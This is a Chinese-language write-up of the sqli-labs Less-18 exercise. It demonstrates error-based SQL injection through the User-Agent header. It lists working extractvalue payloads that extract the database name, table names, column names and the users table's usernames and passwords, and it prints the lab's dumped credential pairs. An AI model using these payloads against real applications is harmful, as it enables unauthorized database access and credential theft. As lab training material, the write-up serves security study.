Less(18) Header Injection - Uagent field - Error based (基于错误的用户代理,头部POST注入)
1.报错型,单引号,user-agent型注入
看到user-agent 的回显,猜测注入点在user-agnet,可以直接测试,但是还是去看看php文件吧:
发现也对password也做了check
又看到了inseert语句,他把user-agent插入到数据库,所以可以从这里下手,而且看到除开是单引号型,接下来开始爆破
2.爆破:
(1)把user-agent修改一下就行:'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and'
没毛病,可以爆破
(2)爆库之前都爆过了
(3)爆表:' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and'
(4)爆列名:' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and column_name not in('user_id','first_name','last_name','user','avatar','last_login','failed_login')))) and'
(5)爆值:' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users))) and'
通过 not in(),我们可以找到所有的用户名和密码:
Dumb:Dumb Angelinal:I-kill-you Dummy:p@ssword secure:crappy stupid:stupidiry superman:genious batman:mob!le admin:admin admin1:admin1 admin2:admin2 admin3:admin3 dhakkan:dumbo admin4:admin4